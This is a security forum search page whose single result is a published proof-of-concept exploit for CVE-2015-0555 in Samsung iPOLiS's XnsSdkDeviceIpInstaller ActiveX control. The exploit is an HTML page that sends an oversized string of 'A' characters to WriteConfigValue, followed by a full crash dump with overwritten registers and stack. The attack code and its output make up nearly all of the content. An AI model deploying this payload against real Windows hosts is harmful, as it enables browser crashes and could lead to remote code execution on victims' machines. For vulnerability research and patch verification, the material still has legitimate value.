Jump to content

Search the Community

Showing results for tags 'ipolis'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 1 result

  1. <!-- # Exploit Title: (0day)Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC (CVE-2015-0555) # Date: 22/02/2015 # Exploit Author: Praveen Darshanam # Vendor Homepage: *https://www.samsung-security.com/Tools/device-manager.aspx # Version: Samsung iPOLiS 1.12.2 # Tested on: Windows 7 Ultimate N SP1 # CVE: 2015-0555 --> <html> <!-- Vulnerability found and PoC coded by Praveen Darshanam http://blog.disects.com CVE-2015-0555 targetFile = "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx" prototype = "Function WriteConfigValue ( ByVal szKey As String , ByVal szValue As String ) As Long" memberName = "WriteConfigValue" progid = "XNSSDKDEVICELib.XnsSdkDevice" Operating System = Windows 7 Ultimate N SP1 Vulnerable Software = Samsung iPOLiS 1.12.2 CERT tried to coordinate but there wasn't any response from Samsung --> <head> Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC </head> <object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object> <script> var arg1 = ""; var arg2="praveend"; for (i=0; i<= 15000; i++) { arg1 += "A"; } target.WriteConfigValue(arg1 ,arg2); </script> </html> <!-- #############Stack Trace#################### Exception Code: ACCESS_VIOLATION Disasm: 149434 MOV AL,[ESI+EDX] Seh Chain: -------------------------------------------------- 1 647C7D7D mfc100.dll 2 647D0937 mfc100.dll 3 64E242CA VBSCRIPT.dll 4 77B3E0ED ntdll.dll Called From Returns To -------------------------------------------------- XNSSDKDEVICE.149434 41414141 41414141 414141 414141 3DA4C4 3DA4C4 mfc100.647790C1 mfc100.647790C1 56746C75 Registers: -------------------------------------------------- EIP 00149434 EAX 00003841 EBX 00609FB0 -> 0015A564 ECX 00003814 EDX 00414141 EDI 0000008F ESI 0000008F EBP 002BE5FC -> Asc: AAAAAAAAAAA ESP 002BE564 -> 0000000C Block Disassembly: -------------------------------------------------- 149423 XOR EDI,EDI 149425 XOR ESI,ESI 149427 MOV [EBP-8C],ECX 14942D TEST ECX,ECX 14942F JLE SHORT 00149496 149431 MOV EDX,[EBP+8] 149434 MOV AL,[ESI+EDX] <--- CRASH 149437 CMP AL,2F 149439 JNZ SHORT 00149489 14943B MOV ECX,EBX 14943D TEST ESI,ESI 14943F JNZ SHORT 0014944D 149441 PUSH 159F28 149446 CALL 0014F7C0 14944B JMP SHORT 00149476 ArgDump: -------------------------------------------------- EBP+8 00414141 EBP+12 003DA4C4 -> Asc: defaultV EBP+16 647790C1 -> EBE84589 EBP+20 FFFFFFFE EBP+24 646CBE5C -> CCCCCCC3 EBP+28 0000001C Stack Dump: -------------------------------------------------- 2BE564 0C 00 00 00 00 E6 2B 00 B0 93 14 00 14 38 00 00 [................] 2BE574 C4 A4 3D 00 41 41 41 41 41 41 41 41 41 41 41 41 [................] 2BE584 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................] 2BE594 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................] 2BE5A4 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................] --> Source
×
×
  • Create New...